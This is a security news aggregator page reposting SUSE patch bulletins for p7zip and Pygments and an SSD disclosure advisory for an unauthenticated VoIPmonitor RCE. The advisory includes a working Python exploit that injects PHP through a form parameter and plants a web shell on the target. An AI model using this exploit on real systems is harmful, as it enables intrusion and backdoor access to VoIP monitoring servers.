———————————

Product: p7zip
Publisher: SUSE
Operating System: SUSE
UNIX variants (UNIX, Linux, OSX)
Impact/Access: Denial of Service — Existing Account
Resolution: Patch/Upgrade
CVE Names: CVE-2021-3465

Original Bulletin:
https://www.suse.com/support/update/announcement/2021/suse-su-20211491-1

Comment: This advisory references vulnerabilities in products which run on
platforms other than SUSE. It is recommended that administrators
running p7zip check for an updated version of the software for their
operating system.

– ————————–BEGIN INCLUDED TEXT——————–

SUSE Security Update: Security update for p7zip

______________________________________________________________________________

Announcement ID: SUSE-SU-2021:1491-1
Rating: moderate
References: #1184699
Cross-References: CVE-2021-3465
Affected Products:
SUSE Linux Enterprise Module for Basesystem 15-SP3
SUSE Linux Enterprise Module for Basesystem 15-SP2
______________________________________________________________________________

An update that fixes one vulnerability is now available.

Description:

This update for p7zip fixes the following issues:

o CVE-2021-3465: Fixed a NULL pointer dereference in
NCompress:CCopyCoder:Code (bsc#1184699)

Patch Instructions:

To install this SUSE Security Update use the SUSE recommended installation
methods like YaST online_update or “zypper patch”.
Alternatively you can run the command listed for your product:

o SUSE Linux Enterprise Module for Basesystem 15-SP3:
zypper in -t patch SUSE-SLE-Module-Basesystem-15-SP3-2021-1491=1
o SUSE Linux Enterprise Module for Basesystem 15-SP2:
zypper in -t patch SUSE-SLE-Module-Basesystem-15-SP2-2021-1491=1

Package List:

o SUSE Linux Enterprise Module for Basesystem 15-SP3 (aarch64 ppc64le s390x
x86_64):
p7zip-16.02-14.5.1
p7zip-debugsource-16.02-14.5.1
o SUSE Linux Enterprise Module for Basesystem 15-SP2 (aarch64 ppc64le s390x
x86_64):
p7zip-16.02-14.5.1
p7zip-debugsource-16.02-14.5.1
p7zip-full-16.02-14.5.1
p7zip-full-debuginfo-16.02-14.5.1

References:

o https://www.suse.com/security/cve/CVE-2021-3465.html
o https://bugzilla.suse.com/1184699

– ————————–END INCLUDED TEXT——————–

Contact information for the authors of the original document is included
in the Security Bulletin above. If you have any questions or need further
information, please contact them directly.

Previous advisories and external security bulletins can be retrieved from:

https://www.auscert.org.au/bulletins/

===========================================================================
Australian Computer Emergency Response Team
The University of Queensland
Brisbane
Qld 4072

iQIVAwUBYJNdGeNLKJtyKPYoAQiveQ//Ux9VKhBOsui6hD2eG6hGTtIHzpuv5Q9l
4O1333I3oopewY7wjjtO6iMg8a4KOzxG+pqcABB8pEQh97UKiq6CWXE+eedKep4k
P+1NyP8xyckdWbG6k7dy9lvNPWz7SNA8OkiFtzFsX5oY2kpnWi46IOV5hR1O+YNg
dJSEoOsplmEi4LRYglliwloZPcaF1WLY0ipqvtR/J8g7Vf6hl8pjYOkCt440Ym24
8irgKisbvv1X/oiSwszdUgvkfiU6ukkjcHFBsNDIZPqaSzcseymBQgc0uj0CqA9q
4xkzo5r8FEsy4iMVDDHvRIo2d+K3hLGxS0zeDVTP8i5cfLmHiNJTGqkVS8uHHzaw
2hsp7eYR+YjAKe+GG6Az79gJbq2pWksX3j7CkY9ZRBn76jt7cPmEs9543dzm97iq
WmJqFx0wMJ8D41PPpkm4v+eme2/EAI//wIje1OZgv5nDVGlfNj1mLLzLMVtEv0eG
p+VCoBX1bpCOEtGs0q7/VosU+IOLKf1c5B1gwq3NzQNdAbf0ZdwN+ui8RAb8eEKS
DiUfAMCvfIRQtuoRriy4UNOp/nVyFbGNv4CkPtt/cCgQIvNNBVpnBCIQfGOFtneJ
j7bAbPXcfxT6qcxQd3Zp/1WmHaL1qvApghCWeJgkAcn0i/8Bm50LIEXbyB5u42Og
514gn6gphPw=
=zpqC
—–END PGP SIGNATURE—–

The post ESB-2021.1553 – [UNIX/Linux][SUSE] p7zip: Denial of service – Existing account appeared first on Malware Devil.

https://malwaredevil.com/2021/05/06/esb-2021-1553-unix-linuxsuse-p7zip-denial-of-service-existing-account/?utm_source=rss&utm_medium=rss&utm_campaign=esb-2021-1553-unix-linuxsuse-p7zip-denial-of-service-existing-account

ESB-2021.1554 – [SUSE] python-Pygments: Denial of service – Remote/unauthenticated

—–BEGIN PGP SIGNED MESSAGE—–
Hash: SHA256

===========================================================================
AUSCERT External Security Bulletin Redistribution

ESB-2021.1554
Security update for python-Pygments
6 May 2021

===========================================================================

AusCERT Security Bulletin Summary
———————————

Product: python-Pygments
Publisher: SUSE
Operating System: SUSE
Impact/Access: Denial of Service — Remote/Unauthenticated
Resolution: Patch/Upgrade
CVE Names: CVE-2021-20270

Reference: ESB-2021.1206
ESB-2021.0988
ESB-2021.0903
ESB-2021.0890

Original Bulletin:
https://www.suse.com/support/update/announcement/2021/suse-su-20211500-1

– ————————–BEGIN INCLUDED TEXT——————–

SUSE Security Update: Security update for python-Pygments

______________________________________________________________________________

Announcement ID: SUSE-SU-2021:1500-1
Rating: important
References: #1183169
Cross-References: CVE-2021-20270
Affected Products:
SUSE Linux Enterprise Server for SAP 15
SUSE Linux Enterprise Server 15-LTSS
SUSE Linux Enterprise Module for Packagehub Subpackages 15-SP3
SUSE Linux Enterprise Module for Packagehub Subpackages 15-SP2
SUSE Linux Enterprise High Performance Computing 15-LTSS
SUSE Linux Enterprise High Performance Computing 15-ESPOS
______________________________________________________________________________

An update that fixes one vulnerability is now available.

Description:

This update for python-Pygments fixes the following issues:

o CVE-2021-20270: Fixed an infinite loop in SML lexer which may lead to DoS
(bsc#1183169)

Patch Instructions:

To install this SUSE Security Update use the SUSE recommended installation
methods like YaST online_update or “zypper patch”.
Alternatively you can run the command listed for your product:

o SUSE Linux Enterprise Server for SAP 15:
zypper in -t patch SUSE-SLE-Product-SLES_SAP-15-2021-1500=1
o SUSE Linux Enterprise Server 15-LTSS:
zypper in -t patch SUSE-SLE-Product-SLES-15-2021-1500=1
o SUSE Linux Enterprise Module for Packagehub Subpackages 15-SP3:
zypper in -t patch SUSE-SLE-Module-Packagehub-Subpackages-15-SP3-2021-1500=
1
o SUSE Linux Enterprise Module for Packagehub Subpackages 15-SP2:
zypper in -t patch SUSE-SLE-Module-Packagehub-Subpackages-15-SP2-2021-1500=
1
o SUSE Linux Enterprise High Performance Computing 15-LTSS:
zypper in -t patch SUSE-SLE-Product-HPC-15-2021-1500=1
o SUSE Linux Enterprise High Performance Computing 15-ESPOS:
zypper in -t patch SUSE-SLE-Product-HPC-15-2021-1500=1

Package List:

o SUSE Linux Enterprise Server for SAP 15 (noarch):
python3-Pygments-2.2.0-4.6.1
o SUSE Linux Enterprise Server 15-LTSS (noarch):
python3-Pygments-2.2.0-4.6.1
o SUSE Linux Enterprise Module for Packagehub Subpackages 15-SP3 (noarch):
python2-Pygments-2.2.0-4.6.1
o SUSE Linux Enterprise Module for Packagehub Subpackages 15-SP2 (noarch):
python2-Pygments-2.2.0-4.6.1
o SUSE Linux Enterprise High Performance Computing 15-LTSS (noarch):
python3-Pygments-2.2.0-4.6.1
o SUSE Linux Enterprise High Performance Computing 15-ESPOS (noarch):
python3-Pygments-2.2.0-4.6.1

References:

o https://www.suse.com/security/cve/CVE-2021-20270.html
o https://bugzilla.suse.com/1183169

– ————————–END INCLUDED TEXT——————–

Contact information for the authors of the original document is included
in the Security Bulletin above. If you have any questions or need further
information, please contact them directly.

Previous advisories and external security bulletins can be retrieved from:

https://www.auscert.org.au/bulletins/

===========================================================================
Australian Computer Emergency Response Team
The University of Queensland
Brisbane
Qld 4072

iQIVAwUBYJNdMONLKJtyKPYoAQjHsg//U8onJINd6SiYuXsiz8NWIQpTkjy8zAER
OS+bKJCXnhhOaKZKE9hvRjGEJcsNZguC4vUp9oi6g8Aw4xP+MLE4PoBVaRIFH/hI
cBTJv0j8d1NOcQAqtmso19Gj3XAFtNnpKI/RvpJ4//XTmNlzw+Czyxpy5nrY9Y1P
WA9+cxeFjgqRDwPf6jhJM64ECYaiMeQtZ5zKBy7RsAx8M30nNxTuqltpSaa85+vV
6JqvevfKq9f5OF15c9874qi/7OjqtsNjUnIv+r8UR3uOYWpXvq8IDLCylrCVtWcu
5Or87PpcxtssWsJhPPttIz5JXHAKp2N2DwrwfuvbUlqaKzjcSsL+xuWejQWubtS4
2r27du44dXUiTHS1fua6Fsgr9fnxwj/6RrezW/WMijrjTkhLkVzg7b1s+V8jam7O
HAYdm7P6d7yYDbQ6iKKqDAiTCLu3MGgBAKJSgHIEpqTpzUFQryFPO0uCmBg1XHnM
jWSHZBOO0dIMZ73/Ts3ZUD2CfppY8S+0dnlwR3FIURjbI0kFQO0plYdKJiZn72yI
VJB28ZbTY1CbBb0x72JnoFnSDHD6anBhy+lTf/Tq9NjizqPGbUhtKjQHvp2UkgGz
ekApyLLA7Z4Bv/xMIV1Ec8OJhKuMRDJuxOjTEhKP1SPnQ9pSQSzWN8q8mG0pyg/9
zne/V64lI9o=
=YPcO
—–END PGP SIGNATURE—–

The post ESB-2021.1554 – [SUSE] python-Pygments: Denial of service – Remote/unauthenticated appeared first on Malware Devil.

https://malwaredevil.com/2021/05/06/esb-2021-1554-suse-python-pygments-denial-of-service-remote-unauthenticated/?utm_source=rss&utm_medium=rss&utm_campaign=esb-2021-1554-suse-python-pygments-denial-of-service-remote-unauthenticated

SSD Advisory – VoIPmonitor UnAuth RCE

TL;DR

Find out how a vulnerability in VoIPmonitor allows an unauthenticated attacker to execute arbitrary code.

Vulnerability Summary

VoIPmonitor is “open source network packet sniffer with commercial frontend for SIP RTP and RTCP VoIP protocols running on linux”.

Use of user supplied data, arriving via web interface allows remote unauthenticated users to trigger a remote PHP code execution vulnerability in VoIPmonitor.

CVE

CVE-2021-30461

Credit

An independent security researcher, Furkan Goksel, has reported this vulnerability to the SSD Secure Disclosure program.

Affected Versions

VoIPmonitor version 24.60 and prior

Vendor Response

“A new GUI release 24.61 is fixing this security issue.”

Vulnerability Analysis

Due to improper filtering of malicious function, attacker can able to run command via PHP application of VoIPMonitor’s web UI.

When POST request has been made to index.php file with SPOOLDIR and recheck parameters, the vulnerability can be triggered.

This is due to the fact that SPOOLDIR value gets introduced into the config/configuration.php file that is later called by the UI interface.

The SPOOLDIR value is placed “as is” in the PHP source code allowing remote attackers to insert arbitrary commands along with the intended value for this parameter.

Exploit

import argparse
from sys import argv,exit
import time
import random
import string
try:
import requests
except ImportError:
print(“pip3 install requests “)
print(“””
###############################################
# VOIP Monitor RCE #
###############################################
“””)
headers = {“User-Agent”: “Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0”, “Accept”: “*/*”, “Accept-Language”: “en-US,en;q=0.5”, “Accept-Encoding”: “gzip, deflate”, “Content-Type”: “application/x-www-form-urlencoded; charset=UTF-8”, “Connection”: “close”}
def get_target(args):
hostname = args.host
path = args.path
if path:
return f”http://{hostname}/{path}/index.php”
else:
return f”http://{hostname}/index.php”
def set_tmp(args):
global headers
target = get_target(args)
n_data = {“SPOOLDIR”: “/tmp”, “recheck”: “annen”}
set_totmp = requests.post(target, n_data, headers=headers)
print(f”[*] set /tmp {set_totmp}”)
def checkVulnerability(args):
global headers
target = get_target(args)
print(f”[+] Attacking {target}”)
testcmd = {“SPOOLDIR”: “test”.system(id).””, “recheck”: “annen”}
response_text = b”uid=”
testcmd_req = requests.post(target, testcmd, verify=False, headers=headers)
if response_text in testcmd_req.content:
print(“[*] host is vulnerable”)
else:
print(“[-] host is not vulnerable”)
exit()
def uploadshell(args):
global headers
hostname = args.host
path = args.path
shell_path = “”
shellfilename = str ( ”.join(random.choice(string.ascii_lowercase) for i in range(10)) )
target = get_target(args)
rce_payload = {“SPOOLDIR”: f”/tmp”.file_put_contents(‘{shellfilename}.php’,'<?php echo system($_GET[“a”]);’).””, “recheck”: “annen”}
rce_req = requests.post(target, headers=headers, data=rce_payload)
print(f”[*] uploading shell {rce_req.status_code}”)
if path:
shell_path = f”http://{hostname}/{path}/{shellfilename}.php”
else:
shell_path = f”http://{hostname}/{shellfilename}.php”
shell_check = requests.get(shell_path, headers=headers, params={‘a’:’id’})
print(f”[*] RCE Check : {shell_check.text}”)
print(f”[*] Your Shell at {shell_path}”)
def main():
parser = argparse.ArgumentParser(description=’VoIP Monitor all versions command execution’)
parser.add_argument(‘-t’,’–host’,help=’Host’, type=str)
parser.add_argument(‘-b’, ‘–path’,help=’Path of the VoIP Monitor’, type=str)
args = parser.parse_args()
set_tmp(args)
checkVulnerability(args)
set_tmp(args)
uploadshell(args)
set_tmp(args)
if __name__ == “__main__”:
main()
Read More

The post SSD Advisory – VoIPmonitor UnAuth RCE appeared first on Malware Devil.

https://malwaredevil.com/2021/05/06/ssd-advisory-voipmonitor-unauth-rce/?utm_source=rss&utm_medium=rss&utm_campaign=ssd-advisory-voipmonitor-unauth-rce

ISC Stormcast For Thursday, May 6th, 2021 https://isc.sans.edu/podcastdetail.html?id=7488, (Thu, May 6th)

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License. Read More

The post ISC Stormcast For Thursday, May 6th, 2021 https://isc.sans.edu/podcastdetail.html?id=7488, (Thu, May 6th) appeared first on Malware Devil.

https://malwaredevil.com/2021/05/06/isc-stormcast-for-thursday-may-6th-2021-https-isc-sans-edu-podcastdetail-htmlid7488-thu-may-6th/?utm_source=rss&utm_medium=rss&utm_campaign=isc-stormcast-for-thursday-may-6th-2021-https-isc-sans-edu-podcastdetail-htmlid7488-thu-may-6th

Wednesday, May 5, 2021

SemperFi: A Spoofer Eliminating GPS Receiver for UAVs

The post SemperFi: A Spoofer Eliminating GPS Receiver for UAVs appeared first on Malware Devil.

https://malwaredevil.com/2021/05/05/semperfi-a-spoofer-eliminating-gps-receiver-for-uavs-2/?utm_source=rss&utm_medium=rss&utm_campaign=semperfi-a-spoofer-eliminating-gps-receiver-for-uavs-2

Security Questionnaires: Why You Received One and How to Answer It Effectively

Information security used to be much simpler—or at least it seemed to be, right? In the past, most …

The post Security Questionnaires: Why You Received One and How to Answer It Effectively appeared first on Hyperproof.

The post Security Questionnaires: Why You Received One and How to Answer It Effectively appeared first on Security Boulevard.

The post Security Questionnaires: Why You Received One and How to Answer It Effectively appeared first on Malware Devil.

https://malwaredevil.com/2021/05/05/security-questionnaires-why-you-received-one-and-how-to-answer-it-effectively/?utm_source=rss&utm_medium=rss&utm_campaign=security-questionnaires-why-you-received-one-and-how-to-answer-it-effectively

¿Cómo gestionar los riesgos cibernéticos del futuro?

El Foro Económico Mundial plantea esta pregunta: ¿será sostenible nuestro enfoque individual y colectivo para gestionar los riesgos cibernéticos frente a las principales tendencias tecnológicas que se estarán produciendo en un futuro próximo?

Un reciente estudio del Foro Económico Mundial …

The post ¿Cómo gestionar los riesgos cibernéticos del futuro? appeared first on ManageEngine Blog.

The post ¿Cómo gestionar los riesgos cibernéticos del futuro? appeared first on Security Boulevard.

The post ¿Cómo gestionar los riesgos cibernéticos del futuro? appeared first on Malware Devil.

https://malwaredevil.com/2021/05/05/como-gestionar-los-riesgos-ciberneticos-del-futuro/?utm_source=rss&utm_medium=rss&utm_campaign=como-gestionar-los-riesgos-ciberneticos-del-futuro

[Valve] critical – Specially Crafted Closed Captions File can lead to Remote Code Execution in CS:GO and other Source Games (7500.00USD)

The post [Valve] critical – Specially Crafted Closed Captions File can lead to Remote Code Execution in CS:GO and other Source Games (7500.00USD) appeared first on Malware Devil.

https://malwaredevil.com/2021/05/05/valve-critical-specially-crafted-closed-captions-file-can-lead-to-remote-code-execution-in-csgo-and-other-source-games-7500-00usd-2/?utm_source=rss&utm_medium=rss&utm_campaign=valve-critical-specially-crafted-closed-captions-file-can-lead-to-remote-code-execution-in-csgo-and-other-source-games-7500-00usd-2

SemperFi: A Spoofer Eliminating GPS Receiver for UAVs

The post SemperFi: A Spoofer Eliminating GPS Receiver for UAVs appeared first on Malware Devil.

https://malwaredevil.com/2021/05/05/semperfi-a-spoofer-eliminating-gps-receiver-for-uavs/?utm_source=rss&utm_medium=rss&utm_campaign=semperfi-a-spoofer-eliminating-gps-receiver-for-uavs

Account takeover of Instagram accounts due to unrestricted permissions of third-party application’s generated tokens

The post Account takeover of Instagram accounts due to unrestricted permissions of third-party application’s generated tokens appeared first on Malware Devil.

https://malwaredevil.com/2021/05/05/account-takeover-of-instagram-accounts-due-to-unrestricted-permissions-of-third-party-applications-generated-tokens-2/?utm_source=rss&utm_medium=rss&utm_campaign=account-takeover-of-instagram-accounts-due-to-unrestricted-permissions-of-third-party-applications-generated-tokens-2

How I Hacked Google App Engine: Anatomy of a Java Bytecode Exploit

The post How I Hacked Google App Engine: Anatomy of a Java Bytecode Exploit appeared first on Malware Devil.

https://malwaredevil.com/2021/05/05/how-i-hacked-google-app-engine-anatomy-of-a-java-bytecode-exploit-2/?utm_source=rss&utm_medium=rss&utm_campaign=how-i-hacked-google-app-engine-anatomy-of-a-java-bytecode-exploit-2

The speed of business is fast – is your PKI keeping up?

Over the last couple of decades, PKI has grown – both in its application and its overall footprint within our…

The post The speed of business is fast – is your PKI keeping up? appeared first on Entrust Blog.

The post The speed of business is fast – is your PKI keeping up? appeared first on Security Boulevard.

The post The speed of business is fast – is your PKI keeping up? appeared first on Malware Devil.

https://malwaredevil.com/2021/05/05/the-speed-of-business-is-fast-is-your-pki-keeping-up/?utm_source=rss&utm_medium=rss&utm_campaign=the-speed-of-business-is-fast-is-your-pki-keeping-up

Malware Devil

Malware Devil

Thursday, May 6, 2021

Identify a Facebook user by his phone number despite privacy settings set

Quais são os tipos mais comuns de ciberataques?

DevOps Connect at RSAC 2021: Insightful Talks, Live Q&A, Workshops, Pilates and More

ESB-2021.1548 – [Win] Cisco Webex Meetings Desktop App: Access privileged data – Existing account

ESB-2021.1549 – [Cisco] Cisco Wide Area Application Services (WAAS): Access confidential data – Existing account

ESB-2021.1550 – [Mac] Cisco AnyConnect Secure Mobility Client: Root compromise – Existing account

ESB-2021.1551 – [Cisco] Cisco Content Security Management Appliance (SMA): Root compromise – Existing account

ESB-2021.1552 – [SUSE] openexr: Denial of service – Remote/unauthenticated

ESB-2021.1553 – [UNIX/Linux][SUSE] p7zip: Denial of service – Existing account

ESB-2021.1554 – [SUSE] python-Pygments: Denial of service – Remote/unauthenticated

SSD Advisory – VoIPmonitor UnAuth RCE

ISC Stormcast For Thursday, May 6th, 2021 https://isc.sans.edu/podcastdetail.html?id=7488, (Thu, May 6th)

Wednesday, May 5, 2021

SemperFi: A Spoofer Eliminating GPS Receiver for UAVs

Security Questionnaires: Why You Received One and How to Answer It Effectively

¿Cómo gestionar los riesgos cibernéticos del futuro?

[Valve] critical – Specially Crafted Closed Captions File can lead to Remote Code Execution in CS:GO and other Source Games (7500.00USD)

SemperFi: A Spoofer Eliminating GPS Receiver for UAVs

Account takeover of Instagram accounts due to unrestricted permissions of third-party application’s generated tokens

How I Hacked Google App Engine: Anatomy of a Java Bytecode Exploit

The speed of business is fast – is your PKI keeping up?

Barbary Pirates and Russian Cybercrime

Blog Archive

About Me